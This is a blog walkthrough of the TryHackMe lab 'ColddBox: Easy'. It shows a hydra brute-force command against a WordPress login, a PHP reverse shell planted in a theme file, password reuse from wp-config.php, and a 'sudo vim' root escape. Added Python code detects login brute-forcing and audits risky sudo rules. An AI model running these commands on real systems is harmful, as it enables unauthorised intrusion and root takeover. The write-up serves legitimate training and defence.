narancs's blog

TryHackMe – ColddBox: Easy walkthrough

Introduction


ColddBox: Easy is an easy difficulty room on TryHackMe. We can get into a WordPress admin panel after a quick enumeration of the website. Once we are logged in, we can insert a PHP reverse shell into the page to get initial access on the host. Then we need to escalate privileges to a normal user, then root user to get both flags.

Enumeration

Note: I have added the IP address of the VM to /etc/hosts as colddbox.thm, so I don't have to use the IP address in every command.

nmap

Results of nmap scan:

There are 2 open ports: an HTTP server is running on port 80, and SSH is listening on the non-standard port 4512. Since we don't know any possible usernames yet, I started by enumerating the website.

gobuster

I used gobuster to get a list of files and directories on the site (the command as run; the word list path is from SecLists):

gobuster dir --url http://colddbox.thm -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 32 -x txt,sql,php,html

We can see that this is a website built with WordPress. There is also a /hidden directory, which I checked first. It contains some text that gives us a few possible usernames:

  • c0ldd
  • hugo
  • philip

hydra

Since I found 3 possible usernames, I started brute-forcing the password for the WordPress login. I went to the /wp-login.php page and tried a few passwords for each user. I noticed that if I enter the username admin and any password, I receive the following error message:

ERROR: Invalid username.

However, if I enter one of the 3 usernames I listed above, I receive a different error. For example:

ERROR: The password you entered for the username hugo is incorrect.

The different message confirms that those 3 users actually exist in WordPress (the login form acts as a username oracle). I used hydra to brute-force the password. Eventually I found a valid password for c0ldd, who happened to be the WordPress administrator, so I did not need to continue with the other 2 users.

First, I sent a login request to wp-login.php and captured it in Burp Suite. This is the quickest way to find the exact form data that hydra has to send for each attempt.

The data that has to be sent to the login page is

log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1

where ^USER^ and ^PASS^ are placeholders that hydra substitutes on every attempt. I know that the error message contains the word "incorrect" when the login attempt fails with a valid username but a wrong password, so I can give hydra that word as the failure string to filter out unsuccessful attempts. The final command is:

hydra -l c0ldd -P /usr/share/wordlists/rockyou.txt colddbox.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1:incorrect"
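Seen from the web server's side, the same attack is easy to spot: hydra sends one POST to /wp-login.php per guess, so one client producing many such POSTs in a short window is the signal. The following detector is an added example and is not part of the original walkthrough; the log lines, IPs and timestamps are constructed.

```python
"""Flag WordPress login brute-forcing in combined-format access logs.
Added example, not from the original walkthrough. hydra sends one POST
to /wp-login.php per guess; sample log lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    # Return ip/ts/method/path/status for one log line, or None if unparsable.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def find_wp_login_bruteforce(lines, threshold=5, window_s=60):
    """Return {ip: total_posts} for clients with at least `threshold`
    POSTs to wp-login.php inside any `window_s`-second sliding window."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_s:
                start += 1  # slide the window start forward
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged

def _line(ip, sec, method, path, status):  # builds one constructed sample line
    return (f'{ip} - - [01/Jan/2024:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 1234')

# One legitimate login (WordPress answers 302 on success) and six rapid failures (200).
SAMPLE_LOG = [_line("10.0.0.9", 1, "GET", "/", 200),
              _line("10.0.0.9", 30, "POST", "/wp-login.php", 302)] + [
    _line("10.0.0.5", 5 + i, "POST", "/wp-login.php", 200) for i in range(6)]
```

Calling find_wp_login_bruteforce(SAMPLE_LOG) returns {'10.0.0.5': 6}; in production the same logic can feed a fail2ban-style block or an alert.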

Exploitation

I logged in with the credentials I found. Since c0ldd is an administrator, I can edit any of the theme's PHP files under Appearance -> Editor. I modified the Sidebar file (sidebar.php) to add a reverse shell.

I used the following reverse shell code: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php. I removed the opening and closing PHP tags (the first and last lines), then updated the IP address and port number in the file accordingly. Then I pasted the code into sidebar.php right after the opening PHP tag.

I started a listener on my Kali VM, then reloaded the home page of the colddbox website, and I received a shell as the www-data user.

user.txt

Only one user has a home directory: c0ldd. It contains the user flag, but as www-data we cannot read the file. Somehow we need to switch to the c0ldd user.

While checking the files in the web root, I found the WordPress configuration file (/var/www/html/wp-config.php). It contains the credentials for the database user. I tried switching to the c0ldd user with the same password, and it worked (the database password was reused for the system account):

www-data@ColddBox-Easy:/home/c0ldd$ su - c0ldd
Password: 
c0ldd@ColddBox-Easy:~$ cat user.txt 
RmV***HIDDEN***vIQ==

root.txt

Then I had to escalate my privileges to root. I checked the sudo permissions of the user, and there are 3 commands that the c0ldd user can execute with sudo (the system's locale is Spanish, so sudo prints its messages in Spanish):

c0ldd@ColddBox-Easy:~$ sudo -l
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
c0ldd@ColddBox-Easy:~$

The GTFOBins website lists a sudo bypass for each of these commands. I used vim to spawn a root shell and read the root flag: https://gtfobins.github.io/gtfobins/vim/.

c0ldd@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'
# cat /root/root.txt
wqF***HIDDEN***YSE=
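For the administrator of a box like this, the lesson from the sudo -l output above is that sudo rules have to be reviewed against GTFOBins before they are granted. The following audit helper is an added example, not part of the walkthrough: it parses the exact sudo -l output shown above (the Spanish locale is handled the same as English, because only the "(runas) command" lines matter) and reports which rules should be removed or restricted. The risky set is limited to the three binaries on this page; a real audit would extend it from GTFOBins.

```python
"""Audit `sudo -l` output for rules that GTFOBins documents as root-escalation paths.
Added example, not from the original walkthrough; the risky set below holds only
the three binaries mentioned on this page."""
import re
from posixpath import basename

# Matches rule lines such as "    (root) /usr/bin/vim" or "(root) NOPASSWD: /bin/ls".
RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]+)\)\s+(?:(?P<nopasswd>NOPASSWD):\s*)?(?P<cmd>\S.*)$')

# Binaries from this page that GTFOBins covers under "sudo". Extend for a real audit.
RISKY = {"vim", "chmod", "ftp"}

def parse_sudo_l(output):
    """Return a list of (runas, nopasswd, command) tuples, one per rule line.
    Header lines (in any locale) and Defaults lines do not match RULE_RE."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m["runas"].strip(), m["nopasswd"] is not None, m["cmd"].strip()))
    return rules

def audit_sudo_l(output, risky=RISKY):
    """Return the rules whose command (first token, basename) is a risky binary."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(output):
        if basename(cmd.split()[0]) in risky:
            findings.append({"runas": runas, "nopasswd": nopasswd, "command": cmd})
    return findings

# The output captured on this box (raw string: secure_path contains backslashes).
SAMPLE_SUDO_L = r"""Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
"""
```

Running audit_sudo_l(SAMPLE_SUDO_L) reports all three rules, each as root and password-protected; a clean sudoers file would return an empty list.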
